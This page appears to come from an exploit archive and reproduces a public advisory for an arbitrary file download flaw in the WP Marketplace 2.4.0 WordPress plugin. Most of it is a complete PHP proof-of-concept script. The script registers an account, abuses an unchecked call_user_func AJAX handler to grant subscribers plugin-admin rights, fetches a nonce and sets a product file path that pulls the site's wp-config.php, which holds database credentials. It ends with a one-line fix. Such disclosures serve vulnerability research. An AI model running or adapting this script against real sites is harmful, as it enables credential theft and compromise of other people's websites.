Home / exploitsPDF  

WordPress Marketplace 2.4.0 Arbitrary File Download

Posted on 25 March 2015

# Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download
# Date: 26-10-2014
# Software Link: https://wordpress.org/plugins/wpmarketplace/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9013 and CVE-2014-9014

1. Description

Anyone can run user defined function because of call_user_func.

File: wpmarketplacelibscart.php

function ajaxinit(){
if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
 if(function_exists($_POST['execute']))
 call_user_func($_POST['execute'],$_POST);
 else
 echo __("function not defined!","wpmarketplace");
 die();
 }
}

http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html

2. Proof of Concept

$file = '../../../wp-config.php';
$url = 'http://wordpress-url/';
$user = 'userlogin';
$email = 'useremail@email.email';
$pass = 'password';
$cookie = "/cookie.txt";

$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

// Register
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
 CURLOPT_POSTFIELDS,
 array(
 'register_form' => 'register',
 'reg[user_login]' => $user,
 'reg[user_email]' => $email,
 'reg[user_pass]' => $pass
 ));
$content = curl_exec($ch);
if (!preg_match("/success/i", $content)) {
 die("Cannot register");
}
// Log in
curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');
curl_setopt($ch,
 CURLOPT_POSTFIELDS,
 array(
 'log' => $user,
 'pwd' => $pass,
 'wp-submit' => 'Log%20In'
 ));
$content = curl_exec($ch);
if (!preg_match('/adminmenu/i', $content)) {
 die("Cannot login");
}
// Add subscriber as plugin admin
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
 CURLOPT_POSTFIELDS,
 array(
 'action' => 'wpmp_pp_ajax_call',
 'execute' => 'wpmp_save_settings',
 '_wpmp_settings[user_role][]' => 'subscriber'
 ));
$content = curl_exec($ch);
if (!preg_match('/Settings Saved Successfully/i', $content)) {
 die("Cannot set role");
}
// Request noonce
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
 CURLOPT_POSTFIELDS,
 array(
 'action' => 'wpmp_pp_ajax_call',
 'execute' => 'wpmp_front_add_product'
 ));
$content = curl_exec($ch);
preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);
if (strlen($nonce[1]) < 2) {
 die("Cannot get nonce");
}
// Set file to download
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,
 CURLOPT_POSTFIELDS,
 array(
 '__product_wpmp' => $nonce[1],
 'post_type' => 'wpmarketplace',
 'id' => '123456',
 'wpmp_list[base_price]' => '0',
 'wpmp_list[file][]' => $file
 ));
$content = curl_exec($ch);
header("Location: ".$url."?wpmpfile=123456");

3. Solution:

Update to version 2.4.1

https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip

 

TOP

Malware :

Exploits :